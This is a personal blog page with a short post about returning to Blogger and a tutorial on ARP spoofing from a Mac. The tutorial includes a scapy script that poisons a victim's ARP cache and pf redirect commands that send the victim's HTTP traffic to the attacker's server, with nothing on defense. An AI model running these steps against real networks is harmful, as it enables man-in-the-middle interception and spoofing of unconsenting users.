Tuesday, October 27, 2015

Back to Blogger

I've decided to switch back to blogger even for my coding needs. I experimented for a year with WordPress using Dreamhost but didn't find the hassle of maintaining it nice. I also forgot to renew my hosting on time and lost all my blog data on Dreamhost. It's much easier to maintain Blogger if I'm not going to blog often as happened the last time.

I think having your own hosting server is a good solution if you blog often but for other cases I think Blogger just works fine.

Monday, October 26, 2015

ARP Spoofing on Mac

ARP referrs to Address Resolution Protocol that is used to resolve Internet layer addresses (IP address) to link layer addresses (MAC address). Since the data transfer takes place below the link (or data link layer) every system needs to have the MAC address to be able to deliver a packet. So if I type https://google.com in my browser my request first needs to go to a gateway(usually a router) which then puts it out into the world. ARP is used to do this mapping between the IP address and the MAC address.

ARP is a stateless protocol. Network hosts usually cache the ARP replies they receive. These mappings can be seen in the arp table using
>> arp -a 
The protocol consists of a simple request and reply mechanism to associate IP's with MAC addresses. But sadly the protocol doesn't contain any method to authenticate these ARP packets. So if somebody sends you a fake ARP request you don't have any mechanism to confirm it's veracity.


If I wanted to spoof an arp table entry I would just send you a malicious ARP request. Most likely you would already have an ARP table entry for this request so it would be flagged as a duplicate but most OS'es do not discard these duplicates. For example Linux ignores unsolicited replies, but on the other hand uses seen requests from other machines to update its cache. If you constantly bombard the victim with these ARP requests the ARP table would be poisoned. Here's a script that does that

from scapy.all import *
import time

op = 1

victim_ip = ''; # victim
ip_to_spoof = ''; # gateway
attacker_mac = ''; # attacker's mac
arp = ARP(op=op, psrc=ip_to_spoof, pdst=victim_ip, hwdst=attacker_mac)

while True: 
    send(arp)
    time.sleep(1)


It uses scapy as a dependency to create and send packets. Once you run the above script you can check the new spoofed entry in the victim's arp table using `arp -a`. Now all of the victim's traffic is going through your IP and since most likely you wouldn't have IP forwarding enabled the victim would be getting 404's.

To make it a bit more fun you can also enable IP forwarding and have some fun sending spoofed pages to the victim. For example you can do this.

# Enable packet forwarding on mac
sudo sysctl -w net.inet.ip.forwarding=1

# Enable port forwarding on mac
sudo pfctl -e

# Add this line to your /etc/pf.conf after enabling port forwarding
rdr on en0 inet proto tcp from $victim_ip to any port = 80 -> 127.0.0.1

# Reload PF configuration to apply the above filter
sudo pfctl -f /etc/pf.conf
The above line redirects all HTTP traffic to the attacker's HTTP WebServer.